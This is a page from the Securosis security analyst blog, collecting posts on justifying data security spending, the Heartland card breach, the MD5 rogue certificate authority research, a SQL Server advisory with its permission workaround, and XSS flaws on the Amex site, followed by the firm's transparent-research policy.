Securosis

Research

The Business Justification For Data Security

You’ve probably noticed that we’ve been a little quieter than usual here on the blog. After blasting out our series on Building a Web Application Security Program, we haven’t been putting up much original content. That’s because we’ve been working on one of our tougher projects over the past 2 weeks. Adrian and I have both been involved with data security (information-centric) security since long before we met. I was the first analyst to cover it over at Gartner, and Adrian spent many years as VP of Development and CTO in data security startups. A while back we started talking about models for justifying data security investments. Many of our clients struggle with the business case for data security, even though they know the intrinsic value. All too often they are asked to use ROI or other inappropriate models. A few months ago one of our vendor clients asked if we were planning on any research in this area. We initially thought they wanted yet-another ROI model, but once we explained our positions they asked to sign up and license the content. Thus, in the very near future, we will be releasing a report (also distributed by SANS) on The Business Justification for Data Security. (For the record, I like the term information-centric better, but we have to acknowledge the reality that “data security” is more commonly used). Normally we prefer to develop our content live on the blog, as with the application security series, but this was complex enough that we felt we needed to form a first draft of the complete model, then release it for public review. Starting today, we’re going to release the core content of the report for public review as a series of posts. Rather than making you read the exhaustive report, we’re reformatting and condensing the content (the report itself will be available for free, as always, in the near future). Even after we release the PDF we’re open to input and intend to continuously revise the content over time. The Business Justification Model Today I’m just going to outline the core concepts and structure of the model. Our principle position is that you can’t fully quantify the value of information; it changes too often, and doesn’t always correlate to a measurable monetary amount. Sure, it’s theoretically possible, but practically speaking we assume the first person to fully and accurately quantify the value of information will win the nobel prize. Our model is built on the foundation that you quantify what you can, qualify the rest, and use a structured approach to combine those results into an overall business justification. We purposely designed this as a business justification model, not a risk/loss model. Yes, we talk about risk, valuation, and loss, but only in the context of justifying security investments. That’s very different from a full risk assessment/management model. Our model follows four steps: Data Valuation: In this step you quantify and qualify the value of the data, accounting for changing business context (when you can). It’s also where you rank the importance of data, so you know if you are investing in protecting the right things in the right order. Risk Estimation: We provide a model to combine qualitative and quantitative risk estimates. Again, since this is a business justification model, we show you how to do this in a pragmatic way designed to meet this goal, rather than bogging you down in near-impossible endless assessment cycles. We provide a starting list of data-security specific risk categories to focus on. Potential Loss Assessment: While it may seem counter-intuitive, we break potential losses from our risk estimate since a single kind of loss may map to multiple risk categories. Again, you’ll see we combine the quantitative and qualitative. As with the risk categories, we also provide you with a starting list. Positive Benefits Evaluation: Many data security investments also contain positive benefits beyond just reducing risk/losses. Reduced TCO and lower audit costs are just two examples. After walking through these steps we show how to match the potential security investment to these assessments and evaluate the potential benefits, which is the core of the business justification. A summarized result might look like: – Investing in DLP content discovery (data at rest scanning) will reduce our PCI related audit costs by 15% by providing detailed, current reports of the location of all PCI data. This translates to $xx per annual audit. – Last year we lost 43 laptops, 27 of which contained sensitive information. Laptop full drive encryption for all mobile workers effectively eliminates this risk. Since Y tool also integrates with our systems management console and tells us exactly which systems are encrypted, this reduces our risk of an unencrypted laptop slipping through the gaps by 90%. – Our SOX auditor requires us to implement full monitoring of database administrators of financial applications within 2 fiscal quarters. We estimate this will cost us $X using native auditing, but the administrators will be able to modify the logs, and we will need Y man-hours per audit cycle to analyze logs and create the reports. Database Activity Monitoring costs %Y, which is more than native auditing, but by correlating the logs and providing the compliance reports it reduces the risk of a DBA modifying a log by Z%, and reduces our audit costs by 10%, which translates to a net potential gain of $ZZ. – Installation of DLP reduces the chance of protected data being placed on a USB drive by 60%, the chances of it being emailed outside the organization by 80%, and the chance an employee will upload it to their personal webmail account by 70%. We’ll be detailing more of the sections in the coming days, and releasing the full report early next month. But please let us know what you think of the overall structure. Also, if you want to take a look at a draft (and we know you) drop us a line… We’re really excited to get this out

Share:
Read Post

Heartland Payment Systems Attempts To Hide Largest Data Breach In History Behind Inauguration

Brian Krebs of the Washington Post dropped me a line this morning on a new article he posted. Heartland Payment Systems, a credit card processor, announced today, January 20th, that up to 100 Million credit cards may have been disclosed in what is likely the largest data breach in history. From Brian’s article: Baldwin said 40 percent of transactions the company processes are from small to mid-sized restaurants across the country. He declined to name any well-known establishments or retail clients that may have been affected by the breach. Heartland called U.S. Secret Service and hired two breach forensics teams to investigate. But Baldwin said it wasn’t until last week that investigators uncovered the source of the breach: A piece of malicious software planted on the company’s payment processing network that recorded payment card data as it was being sent for processing to Heartland by thousands of the company’s retail clients. … “The transactional data crossing our platform, in terms of magnitude… is about 100 million transactions a month,” Baldwin said. “At this point, though, we don’t know the magnitude of what was grabbed.” I want you to roll that number around on your tongue a little bit. 100 Million transactions per month. I suppose I’d try to hide behind one of the most historic events in the last 50 years if I were in their shoes. “Due to legal reviews, discussions with some of the players involved, we couldn’t get it together and signed off on until today,” Baldwin said. “We considered holding back another day, but felt in the interests of transparency we wanted to get this information out to cardholders as soon as possible, recognizing of course that this is not an ideal day from the perspective of visibility.” In a short IM conversation Brian mentioned he called the Secret Service today for a comment, and was informed they were a little busy. We’ll talk more once we know more details, but this is becoming a more common vector for attack, and by our estimates is the most common vector of massive breaches. TJX, Hannaford, and Cardsystems, three of the largest previous breaches, all involved installing malicious software on internal networks to sniff cardholder data and export it. This was also another case that was discovered by initially detecting fraud in the system that was traced back to the origin, rather than through their own internal security controls. Share:

Share:
Read Post

The Network Security Podcast, Episode 134

It’s just Martin and myself on the podcast this week. Originally Martin sent out a bunch of stories and we figured, knowing our verbosity, that we would only get through about 3. But totally against our normal natures we managed to roll through them with nary a non-sequitur. I suppose people really can change. We think we’ve finally figured out our end of year audio problems, but please let me know if anything sounds off to you. Network Security Podcast, Episode 134, January 13, 2009 Time: 32:27 Show Notes: CWE/SANS Top 25 most dangerous programming errors SANS: How to Suck at Information Security The Air Force’s rules of engagement for blogging – This is one that’s worth sending to your marketing/PR departments Phishing scams for money? Don’t bet on it. The High Stakes of Compliance Watchdogs bite IRS for continued security lapses Tonight’s music: Details of the war by clap your hands say yeah Share:

Share:
Read Post

There Are No Trusted Sites: Paris Hilton Edition

While not on the scale of Amex or BusinessWeek, I just find this one amusing. Paris Hilton’s official website was hacked and is serving up a trojan (the malware kind, not what you’d expect from her*). From Network World: The hack was discovered by security vendor ScanSafe, which said that Parishilton.com (note: this site is not safe to visit as of press time) had apparently been compromised since Friday. Visitors to the site are presented with a pop-up window urging them to download software in order to enhance their viewing of the site. Whether they click “yes” or “no” on this window, the site then tries to download a malicious program, known as Trojan-Spy.Zbot.YETH, from another Web site. The best part? Only 12 of 37 tested AV vendors catch the trojan. All of you that give me crap for hammering on AV can go away now. sorry, couldn’t help myself there. Share:

Share:
Read Post

Macworld Coverage

Macworld Expo may no longer be good enough for Apple, but it’s still one of my conference highlights of the year. I’ll be out there today through Thursday while Adrian manages the fort in Phoenix (I’ve managed to convince him that cleaning the cat litter while my wife is at work is a formal job responsibility, please don’t tell him that’s illegal and stuff). Most of my writing this week will be over at TidBITS, but I’ll pop some of my informal thoughts (and anything security related) over here at Securosis and on Twitter. And if any of you are over at the Expo, drop me a line and let’s try to meet up. For the record- I don’t expect any earth shattering new announcements this week, but some nice incremental upgrades. To be honest, I’d rather have better stability and functionality with what I already own than some new device I’ll get in trouble for buying. P.S. Dear Apple, if you do announce anything insanely new and cool, please make it small enough to fit in my carry-on luggage. That is all. Share:

Share:
Read Post

What Regular Users Need To Know About The SSL/Root Certificate Authority Exploit

Update: Verisign already closed the hole. This morning (in the US- afternoon in Europe), a team of security researchers revealed that they are in possession of a forged Certificate Authority digital certificate that pretty much breaks the whole idea of a trusted website. It allows them to create a fake SSL certificate that your browser will accept for any website. The short summary is that this isn’t something you need to worry about as an individual, there isn’t anything you can do about it, and the odds are extremely high that the hole will be closed before any bad guys can take advantage of it. Now for some details and analysis, based on the information they’ve published. Before digging in, if you know what an MD5 hash collision is you really don’t need to be reading this post and should go look at the original research yourself. Seriously, we’re not half as smart as the guys who figured this out. Hell, we probably aren’t smart enough to scrape poop off their shoes (okay, maybe Adrian is, since he has an engineering degree, but all I have is a history one with a smidgen of molecular bio). This seriously impressive research was released today at the Chaos Computer Congress conference. The team, consisting of Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Anne Osvik, and Berne de Weger took advantages of known flaws in the MD5 hash algorithm and combined it with new research (and an array of 200 Sony Playstation 3s) to create a forged certificate all web browsers would trust. Here are the important things you need to know (and seriously, read their paper): All digital certificates use a cryptographic technique known as a hash function as part of the signature to validate the certificate. Most certificates just ‘prove’ a website is who they say they are. Some special certificates are used to sign those regular certificates and prove they are valid (known as a Certificate Authority, or CA). There is a small group of CAs which are trusted by web browsers, and any certificate they issue is in turn trusted. That’s why when you go to your bank, the little lock icon appears in your browser and you don’t get any alerts. Other CAs can issue certificates (heck, we do it), but they aren’t “trusted”, and your browser will alert you that something fishy might be going on. One of the algorithms used for this hash function is called MD5, and it’s been broken since 2004. The role of a hash function is to take a block of information, then produce a shorter string characters (bits) that identifies the original block. We use this to prove that the original wasn’t modified- if we have the text, and we have the MD5 results, we can recalculate the MD5 from the original and it should produce exactly the same result, which must match the hash we got. If someone changes even a single character in the original, the hash we calculate will be completely different from the one we got to check against. Without going into detail, we rely on these hash functions in digital certificates to prove that the text we read in them (particularly the website address and company name) hasn’t been changed and can be trusted. That way a bad guy can’t take a good certificate and just change a few fields to say whatever they want. But MD5 has some problems that we’ve known about for a while, and it’s possible to create “collisions”. A collision is when two sources have the exact same MD5 hash. All hash algorithms can have collisions (if they were really 1:1, they would be as long as the original and have no purpose), but it’s the job of cryptographers to make collisions very rare, and ideally make it effectively impossible to force a collision. If a bad guy could force an MD5 hash collision between a real cert and their a fake, we would have no way to tell the real from the forgery. Research from 2004 and then in 2007 showed this is possible with MD5, and everyone was advised to stop using MD5 as a result. Even with that research, forging an MD5-based digital certificate for a CA hadn’t ever been done, and was considered very complex, if not impossible. Until now. The research team developed new techniques and actually forged a certificate for RapidSSL, which is owned by Verisign. They took advantage of a series of mistakes by RapidSSL/Verisign and can now fake a trusted certificate for any website on the planet, by signing it with their rogue CA certificate (which carries an assurance of trustworthiness from RapidSSL, and thus indirectly from Verisign). RapidSSL is one of 6 root CAs that the research team identified as still using MD5. RapidSSL also uses an automatic system with predictable serial numbers and timing, two fields the researchers needed to control for their method to work. Without these three elements (MD5, serial number, and timing) they wouldn’t be able to create their certificate. They managed to purchase a legitimate certificate from RapidSSL/Verisign with exactly the information they needed to use the contents to create their own, fake, trusted Certificate Authority certificate they can then use to create forged certificates for any website. They used some serious math, new techniques, and a special array of 200 Sony PS3s to create their rogue certificate. Since browsers will trust any certificate signed by a trusted CA, this means the researchers can create fake certificates for any site, no matter who originally issued the certificate for that site. But don’t worry- the researchers took a series of safety precautions, one being that they set their certificate to expire in 2004- meaning that unless you set the clock back on your computer, you’ll still get a security alert for any certificate they sign (and they are keeping it secret in the first place). All the Certificate Authorities and web browser companies are

Share:
Read Post

SQL Server Security Advisory (961040)

‘The Microsoft Security Advisory (961040) for SQL Server was posted on the 22nd of December. Microsoft has done a commendable job and provided a lot of information on this page, with the cross reference of the CVE number (CVE-2008-4270) so you can find more details if you need it. Like any of the store procedures that provide remote code execution, they can be dangerous and are targets for hackers. You want to patch as soon as Microsoft releases a patch. Microsoft states that “… MSDE 2000 or SQL Server 2005 Express are at risk of remote attack if they have modified the default installation to accept remote connections, if they allow untrusted users access to MSDE 2000 or SQL Server 2005 Express …”. But I rate the risk higher than what they are saying because of the following: MSDE 2000 and SQL Server Express 2005 are often bundled/embedded into applications and so their presence is not immediately apparent. There may be copies around that most IT staff are not fully aware of, and/or these applications may be delivered with open permissions because the developer of the application was not concerned with these functions. Second, replication is an administrative function. sp_replwritetovarbin, along with other stored procedures like sp_resyncexecutesql and sp_resyncexecute functions run as DBO, or Database Owner, so if they are compromised they expose permissions as well as function. Finally, as MSDE 2000 and SQL Server Express 2005 get used by web developers who run the database on the same machine with the same OS/DBA credentials, you server could be completely compromised with this one. So follow their advice and run the command: “use master  deny execute on sp_replwritetovarbin to public” A couple more recommendations, assuming you are a DBA (which is a fair assumption if you are running the suggested workaround) check the master.dbo.sysprotects and master.dbo.sysobjects for public permissions in general. Even if you are patched for this specific vulnerability, or if you are running an unaffected version of the database, you should have this procedure locked down otherwise you remain vulnerable. Over and above patching the known servers, if you have a scanning and discovery tool, run a scan across your network for the default SQL Server port to see if there are other database engines. That should spotlight the majority of undocumented databases. Share:

Share:
Read Post

SQL Server Zero Day: Security Advisory (961040)

The Microsoft Security Advisory (961040) for SQL Server was posted on the 22nd of December. Microsoft has done a commendable job and provided a lot of information on this page, with the cross reference of the CVE number (CVE-2008-4270) so you can find more details if you need it. Like any of the store procedures that provide remote code execution, they can be dangerous and are targets for hackers. You want to patch as soon as Microsoft releases a patch. Microsoft states that “… MSDE 2000 or SQL Server 2005 Express are at risk of remote attack if they have modified the default installation to accept remote connections, if they allow untrusted users access to MSDE 2000 or SQL Server 2005 Express …”. But I rate the risk higher than what they are saying because of the following: MSDE 2000 and SQL Server Express 2005 are often bundled/embedded into applications and so their presence is not immediately apparent. There may be copies around that most IT staff are not fully aware of, and/or these applications may be delivered with open permissions because the developer of the application was not concerned with these functions. Second, replication is an administrative function. sp_replwritetovarbin, along with other stored procedures like sp_resyncexecutesql and sp_resyncexecute functions run as DBO, or Database Owner, so if they are compromised they expose permissions as well as function. Finally, as MSDE 2000 and SQL Server Express 2005 get used by web developers who run the database on the same machine with the same OS/DBA credentials, you server could be completely compromised with this one. So follow their advice and run the command: “use master deny execute on sp_replwritetovarbin to public” A couple more recommendations, assuming you are a DBA (which is a fair assumption if you are running the suggested workaround) check the master.dbo.sysprotects and master.dbo.sysobjects for public permissions in general. Even if you are patched for this specific vulnerability, or if you are running an unaffected version of the database, you should have this procedure locked down otherwise you remain vulnerable. Over and above patching the known servers, if you have a scanning and discovery tool, run a scan across your network for the default SQL Server port to see if there are other database engines. That should spotlight the majority of undocumented databases. Share:

Share:
Read Post

There Are No Trusted SItes: AMEX Edition

Remember our first post that there are no trusted sites? Followed by our second one? Now I suppose it’s time to start naming names in the post titles, since this seems to be a popular trend. American Express is our latest winner. From Dark Reading: Researchers have been reporting vulnerabilities on the Amex site since April, when the first of several cross-site scripting (XSS) flaws was reported. However, researcher Russell McRee caused a stir again just a week ago when he reported newly discovered XSS vulnerabilities on the Amex site. The vulnerability, which is caused by an input validation deficiency in a get request, can be exploited to harvest session cookies and inject iFrames, exposing Amex site users to a variety of attacks, including identity theft, researchers say. McRee was tipped off to the problem when the Amex site prompted him to shorten his password – an unusual request in today’s security environment, where strong passwords are usually encouraged. … McRee says American Express did not respond to his warnings about the vulnerability. However, in a report issued by The Register on Friday, at least two researchers said they found evidence that American Express had attempted to fix the flaw – and failed. “They did not address the problem,” says Joshua Abraham, a Web security consultant for Rapid7, a security research firm. “They addressed an instance of the problem. You want to look at the whole application and say, ‘Where could similar issues exist?’” No, we don’t intend on posting every one of these we hear about, but some of the bigger ones serve as nice reminders that there really isn’t any such thing as a “safe” website. Share:

Share:
Read Post

MIT Students Now Helping MBTA- Like They Always Should Have

Remember our guest post from Jesse Krembs on the MIT students put under a gag order during DefCon this year for hacking the rail system? And I quote: Please grow up; in the connected world there are very few ogres in caves any more, and they don’t let you ride their trains. The difference between black hats and white hats is a line, and it’s a gray one. But occasionally it gets a little contrast. When you treat the person or organization with a security problem like a victim or an enemy, then you’re the bad guy. You’re basically fucking them over, sometimes hard, sometimes gently, but it’s still a screw job. When you treat them like a partner, then everyone wins. Sure, sometimes they don’t want partners, and sometimes you have to go public because they put the rest of the world at risk, but you don’t know that until you try talking to them. Finally I should note that in the end the only people winning in this case are the lawyers; the kids won’t win in the way they want, nor will the MBTA. The lawyers, on the other hand, always get paid Looks like Superman just spun the Earth backwards and turned back time (sort of): The announcement brings to a close a high profile case that pitted the rights of security researchers to freely discuss their findings against the concerns of one of the country’s largest transit systems, which worried that this type of information could lead to widespread ticket fraud. “I’m really glad to have it behind me. I think this is really what should have happened from the start,” said Zack Anderson, one of the students sued by the MBTA. … The settlement ends the matter in an amicable way. “For professional reasons and for public interest reasons, the students wanted to help the MBTA,” said Jennifer Granick, a lawyer with the Electronic Frontier Foundation who represents the students. The case against the three was finally settled on Oct. 7, but this was not publicly announced until Monday, because it took two months for all parties to schedule a public announcement of the settlement, Granick said. The researchers met with MBTA technical staff on Oct. 21 to discuss their findings and are working to improve the transit authority’s fare collection system, she added. And all is good in the world again. Share:

Share:
Read Post

Totally Transparent Research is the embodiment of how we work at Securosis. It’s our core operating philosophy, our research policy, and a specific process. We initially developed it to help maintain objectivity while producing licensed research, but its benefits extend to all aspects of our business.

Going beyond Open Source Research, and a far cry from the traditional syndicated research model, we think it’s the best way to produce independent, objective, quality research.

Here’s how it works:

  • Content is developed ‘live’ on the blog. Primary research is generally released in pieces, as a series of posts, so we can digest and integrate feedback, making the end results much stronger than traditional “ivory tower” research.
  • Comments are enabled for posts. All comments are kept except for spam, personal insults of a clearly inflammatory nature, and completely off-topic content that distracts from the discussion. We welcome comments critical of the work, even if somewhat insulting to the authors. Really.
  • Anyone can comment, and no registration is required. Vendors or consultants with a relevant product or offering must properly identify themselves. While their comments won’t be deleted, the writer/moderator will “call out”, identify, and possibly ridicule vendors who fail to do so.
  • Vendors considering licensing the content are welcome to provide feedback, but it must be posted in the comments - just like everyone else. There is no back channel influence on the research findings or posts.
    Analysts must reply to comments and defend the research position, or agree to modify the content.
  • At the end of the post series, the analyst compiles the posts into a paper, presentation, or other delivery vehicle. Public comments/input factors into the research, where appropriate.
  • If the research is distributed as a paper, significant commenters/contributors are acknowledged in the opening of the report. If they did not post their real names, handles used for comments are listed. Commenters do not retain any rights to the report, but their contributions will be recognized.
  • All primary research will be released under a Creative Commons license. The current license is Non-Commercial, Attribution. The analyst, at their discretion, may add a Derivative Works or Share Alike condition.
  • Securosis primary research does not discuss specific vendors or specific products/offerings, unless used to provide context, contrast or to make a point (which is very very rare).
    Although quotes from published primary research (and published primary research only) may be used in press releases, said quotes may never mention a specific vendor, even if the vendor is mentioned in the source report. Securosis must approve any quote to appear in any vendor marketing collateral.
  • Final primary research will be posted on the blog with open comments.
  • Research will be updated periodically to reflect market realities, based on the discretion of the primary analyst. Updated research will be dated and given a version number.
    For research that cannot be developed using this model, such as complex principles or models that are unsuited for a series of blog posts, the content will be chunked up and posted at or before release of the paper to solicit public feedback, and provide an open venue for comments and criticisms.
  • In rare cases Securosis may write papers outside of the primary research agenda, but only if the end result can be non-biased and valuable to the user community to supplement industry-wide efforts or advances. A “Radically Transparent Research” process will be followed in developing these papers, where absolutely all materials are public at all stages of development, including communications (email, call notes).
    Only the free primary research released on our site can be licensed. We will not accept licensing fees on research we charge users to access.
  • All licensed research will be clearly labeled with the licensees. No licensed research will be released without indicating the sources of licensing fees. Again, there will be no back channel influence. We’re open and transparent about our revenue sources.

In essence, we develop all of our research out in the open, and not only seek public comments, but keep those comments indefinitely as a record of the research creation process. If you believe we are biased or not doing our homework, you can call us out on it and it will be there in the record. Our philosophy involves cracking open the research process, and using our readers to eliminate bias and enhance the quality of the work.

On the back end, here’s how we handle this approach with licensees:

  • Licensees may propose paper topics. The topic may be accepted if it is consistent with the Securosis research agenda and goals, but only if it can be covered without bias and will be valuable to the end user community.
  • Analysts produce research according to their own research agendas, and may offer licensing under the same objectivity requirements.
  • The potential licensee will be provided an outline of our research positions and the potential research product so they can determine if it is likely to meet their objectives.
  • Once the licensee agrees, development of the primary research content begins, following the Totally Transparent Research process as outlined above. At this point, there is no money exchanged.
  • Upon completion of the paper, the licensee will receive a release candidate to determine whether the final result still meets their needs.
  • If the content does not meet their needs, the licensee is not required to pay, and the research will be released without licensing or with alternate licensees.
  • Licensees may host and reuse the content for the length of the license (typically one year). This includes placing the content behind a registration process, posting on white paper networks, or translation into other languages. The research will always be hosted at Securosis for free without registration.

Here is the language we currently place in our research project agreements:

Content will be created independently of LICENSEE with no obligations for payment. Once content is complete, LICENSEE will have a 3 day review period to determine if the content meets corporate objectives. If the content is unsuitable, LICENSEE will not be obligated for any payment and Securosis is free to distribute the whitepaper without branding or with alternate licensees, and will not complete any associated webcasts for the declining LICENSEE. Content licensing, webcasts and payment are contingent on the content being acceptable to LICENSEE. This maintains objectivity while limiting the risk to LICENSEE. Securosis maintains all rights to the content and to include Securosis branding in addition to any licensee branding.

Even this process itself is open to criticism. If you have questions or comments, you can email us or comment on the blog.